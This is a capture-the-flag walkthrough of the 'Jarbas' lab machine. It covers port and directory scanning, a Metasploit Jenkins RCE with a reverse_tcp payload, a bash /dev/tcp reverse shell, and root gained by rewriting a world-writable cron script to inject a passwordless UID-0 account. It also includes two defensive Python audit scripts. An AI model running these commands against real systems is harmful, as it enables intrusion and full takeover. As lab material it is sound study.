Target Range 59

NMAP scan report

```
# root @ Divint3 in /home/divint3/web/blog [19:55:54] C:130
$ nmap 172.17.135.54 -O -sS -A -Pn

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-29 19:55 CST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 19:56 (0:00:00 remaining)
Nmap scan report for 172.17.135.54
Host is up (0.0026s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|_  256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 3 hops

TRACEROUTE (using port 256/tcp)
HOP RTT     ADDRESS
1   ...
2   4.76 ms bogon (192.168.230.30)
3   1.59 ms 172.17.135.54

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.08 seconds
```

As the scan shows, Jetty is running on port 8080: http://172.17.135.54:8080

```
# root @ Divint3 in /home/divint3/web/blog [20:15:48]
$ dirb http://172.17.135.54:8080 > /home/divint3/ctf_chache/list.txt

# root @ Divint3 in /home/divint3/web/blog [20:07:57]
$ sed '/^==>.*/!d' /home/divint3/ctf_chache/list.txt
==> DIRECTORY: http://172.17.135.54:8080/assets/
==> DIRECTORY: http://172.17.135.54:8080/git/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/
==> DIRECTORY: http://172.17.135.54:8080/git/class/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/classes/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/fields/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/name/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/package/
==> DIRECTORY: http://172.17.135.54:8080/git/class/class/
==> DIRECTORY: http://172.17.135.54:8080/git/class/classes/
==> DIRECTORY: http://172.17.135.54:8080/git/class/fields/
==> DIRECTORY: http://172.17.135.54:8080/git/class/name/
==> DIRECTORY: http://172.17.135.54:8080/git/class/package/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/class/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/classes/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/fields/

# root @ Divint3 in /home/divint3/web/blog [20:15:41] C:1
$ sed -e '/^+.*/!d' /home/divint3/ctf_chache/list.txt
+ http://172.17.135.54:8080/error (CODE:400|SIZE:5329)
+ http://172.17.135.54:8080/favicon.ico (CODE:200|SIZE:17542)
+ http://172.17.135.54:8080/login (CODE:200|SIZE:5988)
+ http://172.17.135.54:8080/logout (CODE:302|SIZE:0)
+ http://172.17.135.54:8080/robots.txt (CODE:200|SIZE:71)
+ http://172.17.135.54:8080/assets/dynamic (CODE:500|SIZE:13989)
```

dirb found robots.txt:

```
# we don't want robots to click "build" links
User-agent: *
Disallow: /
```

First, try a script.

```
msf5 exploit(multi/http/jenkins_script_console) > search jenkins

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   1   auxiliary/gather/jenkins_cred_recovery                                 normal     Yes    Jenkins Domain Credential Recovery
   2   auxiliary/scanner/http/jenkins_command                                 normal     Yes    Jenkins-CI Unauthenticated Script-Console Scanner
   3   auxiliary/scanner/http/jenkins_enum                                    normal     Yes    Jenkins-CI Enumeration
   4   auxiliary/scanner/http/jenkins_login                                   normal     Yes    Jenkins-CI Login Utility
   5   auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum                   normal     No     Jenkins Server Broadcast Enumeration
   6   exploit/linux/misc/jenkins_java_deserialize           2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
   7   exploit/linux/misc/jenkins_ldap_deserialize           2016-11-16       excellent  Yes    Jenkins CLI HTTP Java Deserialization Vulnerability
   8   exploit/linux/misc/opennms_java_serialize             2015-11-06       normal     No     OpenNMS Java Object Unserialization Remote Code Execution
   9   exploit/multi/http/jenkins_metaprogramming            2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
   10  exploit/multi/http/jenkins_script_console             2013-01-18       good       Yes    Jenkins-CI Script-Console Java Execution
   11  exploit/multi/http/jenkins_xstream_deserialize        2016-02-24       excellent  Yes    Jenkins XStream Groovy classpath Deserialization Vulnerability
   12  exploit/windows/misc/ibm_websphere_java_deserialize   2015-11-06       excellent  No     IBM WebSphere RCE Java Deserialization Vulnerability
   13  post/multi/gather/jenkins_gather                                       normal     No     Jenkins Credential Collector
```

Use exploit/multi/http/jenkins_metaprogramming:

```
set rhost 172.17.135.59
set rport 8080
set payload java/meterpreter/reverse_tcp
set lhost 172.17.135.80
set lport 4442
set ForceExploit true
run
```

Reverse shell back to the local machine:

```
bash -i >& /dev/tcp/172.17.135.80/4442 0>&1
```

Returned:

```
# root @ Divint3 in /home/divint3 [18:58:07] C:1
$ nc -lvp 4442
listening on [any] 4442 ...
connect to [172.17.135.80] from bogon [172.17.135.59] 55308
```

Tried SUID file privilege escalation; no suitable files found.

Found a crontab:

```
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
```

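The root cron job above is the weak point of this machine: a script run as root every five minutes that a low-privileged user can rewrite. As an added defensive check (my own example, not part of the original writeup), the Python audit below parses a system crontab in the `/etc/crontab` format and flags root jobs whose target script is group- or world-writable, not owned by root, missing, or referenced by a relative path. The sample crontab, the temporary scripts it points at and the `demo()` helper are constructed for the example; on a real host you would feed it the contents of `/etc/crontab` and the files under `/etc/cron.d/`.

```python
#!/usr/bin/env python3
"""Audit a system crontab for root jobs that execute a script non-root users can change."""
import os
import stat
import tempfile
from typing import List, NamedTuple


class CronJob(NamedTuple):
    schedule: str
    user: str
    command: str


def parse_system_crontab(text: str) -> List[CronJob]:
    """Parse /etc/crontab-style lines: five schedule fields, a user name, then the command.
    Comments, blank lines and VAR=value assignments (SHELL=, PATH=, MAILTO=) are skipped."""
    jobs: List[CronJob] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                  # @reboot, @daily, ... have a single schedule token
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append(CronJob(*parts))
            continue
        if "=" in line.split(None, 1)[0]:         # environment assignment, not a job
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append(CronJob(" ".join(parts[:5]), parts[5], parts[6]))
    return jobs


def audit_root_jobs(jobs: List[CronJob], root_uids=(0,)) -> List[str]:
    """Return one finding per weakness in jobs that cron runs as root.
    root_uids lists the owner uids considered trustworthy for the executed script."""
    findings: List[str] = []
    for job in jobs:
        if job.user != "root":
            continue
        target = job.command.split()[0]
        if not target.startswith("/"):
            findings.append(f"{target}: relative command resolved through cron's PATH")
            continue
        try:
            st = os.stat(target)
        except FileNotFoundError:
            findings.append(f"{target}: script referenced by root cron job does not exist")
            continue
        if st.st_uid not in root_uids:
            findings.append(f"{target}: owned by uid {st.st_uid}, not root")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{target}: group/world-writable (mode {oct(st.st_mode & 0o777)})")
    return findings


def demo() -> List[str]:
    """Constructed sample: one root job pointing at a world-writable script (the pattern
    seen on this machine) and one pointing at a properly locked-down script."""
    tmp = tempfile.mkdtemp()
    loose = os.path.join(tmp, "CleaningScript.sh")   # constructed stand-in for /etc/script/CleaningScript.sh
    tight = os.path.join(tmp, "backup.sh")            # constructed, mode 0755
    for path, mode in ((loose, 0o777), (tight, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(path, mode)
    crontab = f"""SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# constructed sample entries
*/5 * * * * root {loose} >/dev/null 2>&1
0 3 * * * root {tight}
30 4 * * * eder /home/eder/cleanup.sh
"""
    jobs = parse_system_crontab(crontab)
    # The temp files belong to whoever runs the demo, so treat that uid as trusted here
    # to exercise only the permission-bit check; on a real host keep the default (0,).
    return audit_root_jobs(jobs, root_uids=(0, os.getuid()))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Only the world-writable `CleaningScript.sh` stand-in is reported; the 0755 script and the non-root `eder` job pass. The fix the finding points at is the usual one: root-owned scripts, mode 0755 or tighter, in a root-owned directory.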
Modify the target script:

```
echo "sed -i '/^root.*/a divint3::0:0:root:/root:/bin/bash'" > /etc/script/CleaningScript.sh
```

Wait a while:

```
su divint3
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"
[root@jarbas /]# cd /root
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs



[root@jarbas ~]# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
```

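The repeated `divint3::0:0:root:/root:/bin/bash` lines above (one per cron run) are exactly what a defender should be alerting on: a second UID-0 account with an empty password field. As an added example that is not part of the original post, the Python check below parses `/etc/passwd` and reports UID-0 accounts other than `root`, accounts whose password field is empty, password hashes stored in `passwd` rather than `shadow`, and duplicated usernames. The sample input is a constructed excerpt of the passwd file shown above.

```python
#!/usr/bin/env python3
"""Spot backdoor accounts in /etc/passwd: extra UID-0 users, empty password
fields (no password asked at su/login) and duplicated usernames."""
from collections import Counter
from typing import List, NamedTuple


class PasswdEntry(NamedTuple):
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines; every non-blank line must have exactly seven colon-separated fields."""
    entries: List[PasswdEntry] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(entries: List[PasswdEntry]) -> List[str]:
    """Return one finding per suspicious property, in file order, then duplicate-name findings."""
    findings: List[str] = []
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 but not 'root'")
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field (no password required)")
        elif e.passwd != "x" and not e.passwd.startswith(("!", "*")):
            # "x" means the hash lives in /etc/shadow; "!"/"*" mean locked
            findings.append(f"{e.name}: password hash stored in passwd instead of shadow")
    for name, count in Counter(e.name for e in entries).items():
        if count > 1:
            findings.append(f"{name}: appears {count} times")
    return findings


# Constructed excerpt of the passwd file shown in the writeup (two of the injected lines kept).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
"""


if __name__ == "__main__":
    for finding in audit_passwd(parse_passwd(SAMPLE_PASSWD)):
        print(finding)
```

On a live host, `audit_passwd(parse_passwd(open("/etc/passwd").read()))` gives the same report; a clean CentOS 7 passwd file like the one on this machine produces no findings at all, so any output is worth a look. Pairing it with a file-integrity check on `/etc/passwd` and `/etc/script/` would have caught this persistence within one cron interval.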
Gotta eat, gotta eat.